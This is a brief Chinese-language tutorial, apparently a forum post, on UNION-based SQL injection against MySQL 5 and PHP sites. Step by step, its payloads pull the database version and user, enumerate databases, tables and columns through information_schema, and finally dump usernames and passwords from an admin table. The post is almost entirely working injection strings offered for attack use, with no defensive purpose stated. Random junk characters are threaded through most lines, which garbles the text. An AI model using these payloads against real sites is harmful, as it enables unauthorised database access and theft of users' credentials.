B5 w9 C" [. e* x* A教程内容:Mysql 5+php 注入
4 p; w. K) R9 P8 J f* l7 Z& n! S8 W* L
0 z, j2 u* G) P- W
- b# }7 P: e4 s( p3 k( s+ x一.查看MYSQL基本信息(库名,版本,用户)% G1 G+ t6 ~9 W* F
5 ] S% W3 C, X+ s4 U# |4 s
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*2 D/ R9 X. P2 v. R! g
% i k1 I& H- Q* x- E
二.查数据库
h5 o/ U0 W; E6 k5 x5 |- W8 D8 i" H; O! S1 n& {1 j" r9 J5 _9 a
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*/ R9 y* [/ H1 m: R( S5 @
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。0 P/ l! Q+ ?3 t5 u% S
8 E8 Y) U. x n, l1 a* ]
三.暴表
3 a+ e( p; U! S6 `0 j' a3 l' `' G6 w+ ^. ^6 A0 |
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
& N1 b# \6 k3 _1 J
M0 u( R* f( Y& N/ u) jlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
$ M7 c; n+ i4 g+ ~7 n3 b4 v, A: J& M/ N% @4 d6 y
四.暴字段: w* G( ^1 o. P7 @- `$ l4 I( x
" O1 q# v. o7 L/ Z6 E3 Dand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*7 b( X% c0 L( @- w& r' |
! {3 H* i) v i8 U) X, Y* B
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
5 ]4 }! n8 H. I+ Q0 S
; t6 C1 d4 y3 D6 l/ V! h五.暴数据
9 ?& D1 T2 G* e* ^8 }0 @4 ]
8 [5 a& ^. [6 {! \1 i/ ^and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
- h" q2 D5 ? m" C0 t) @ T \! p1 B3 ^: m. t, v. B& e
/ I5 ^; ?' @& G这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。( k" Q( x& }( H. r* c
|